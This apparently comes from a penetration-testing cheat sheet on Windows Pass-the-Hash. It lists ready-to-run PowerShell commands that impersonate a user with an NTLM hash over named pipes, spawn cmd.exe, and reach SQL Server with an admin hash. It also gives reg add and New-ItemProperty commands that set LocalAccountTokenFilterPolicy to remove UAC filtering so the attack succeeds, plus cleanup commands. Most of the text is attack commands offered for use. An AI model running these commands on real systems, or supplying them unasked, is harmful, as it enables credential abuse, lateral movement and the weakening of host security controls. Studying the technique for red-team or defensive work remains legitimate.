NamedPipePTH
Impersonate a user with Pass-the-Hash for local actions (network authentication does not work with Impersonation Token, only with Delegation Token):
Copy PS > Invoke-ImpersonateUser-PTH -Username snovvcrash -Hash fc525c9683e8fe067095ba2ddc971889 -Target localhost -Domain . -PipeName mypipe -Binary C:\Windows\System32\cmd.exe -Verbose
PS > Invoke-SharpNamedPipePTH -C "username:snovvcrash domain:{megacorp.local|localhost} hash:fc525c9683e8fe067095ba2ddc971889 binary:C:\Windows\System32\cmd.exe" Can be used for authenticating in SQL Server management tools (%PROGRAMFILES(X86)%\Microsoft SQL Server Management Studio 18\Common7\IDE\Ssms.exe) and accessing DBs with SQL admin hash, for example.
PtH Notes
User Account Control
LocalAccountTokenFilterPolicy & FilterAdministratorToken
Property Name
Property Path
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\
If LocalAccountTokenFilterPolicy exists and is set to 1 (doesn't exist by default), remote connections from all local admins are not affected by UAC and PtH will succeed:
Copy PS > Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\" -Name LocalAccountTokenFilterPolicy If FilterAdministratorToken exists and is set to 1 (doesn't exist by default), builtin local admin account (RID 500) is affected by UAC and PtH will fail:
Copy PS > Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\" -Name FilterAdministratorToken Add:
Copy Cmd > reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
PS > New-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name "LocalAccountTokenFilterPolicy" -PropertyType "DWORD" -Value 1 -Force Cleanup:
Copy Cmd > reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v LocalAccountTokenFilterPolicy /f
PS > Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name "LocalAccountTokenFilterPolicy" -Force 